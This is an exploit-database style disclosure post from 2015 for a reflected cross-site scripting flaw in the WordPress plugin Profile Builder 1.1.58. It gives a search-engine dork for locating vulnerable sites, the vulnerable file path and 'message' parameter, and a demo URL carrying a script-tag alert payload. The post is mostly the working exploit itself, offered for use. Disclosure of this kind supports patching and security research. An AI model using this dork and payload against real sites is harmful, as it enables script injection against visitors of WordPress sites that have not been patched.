facebook facebook twitter rss

Wordpress plugin Profile Builder 1.1.58 XSS

Author: NULLpOint7r , Published: 17-02-2015
# Exploit Title: Wordpress plugin Profile Builder 1.1.58 XSS
# Exploit Author: NULLpOint7r
# Contact me: seidbenseidok@gmail.com
# Home: http://www.sec4ever.com/home/
# Date: 2015-02-16
# Dork: inurl:/wp-content/plugins/profile-builder/
# Version: 1.1.58
# Download link: https://downloads.wordpress.org/plugin/profile-builder.1.1.58.zip

exploit:
http://127.0.0.1/wp-content/plugins/profile-builder/assets/misc/wppb.fallback.page.php?message=[XSS]

demo:
http://bug-bounty.com/wp-content/plugins/profile-builder/assets/misc/wppb.fallback.page.php?message=<script>alert(/this is XSS/)</script>

pOc: http://s4.postimg.org/nga0n0tp9/p_Oc.png

Like us on Facebook :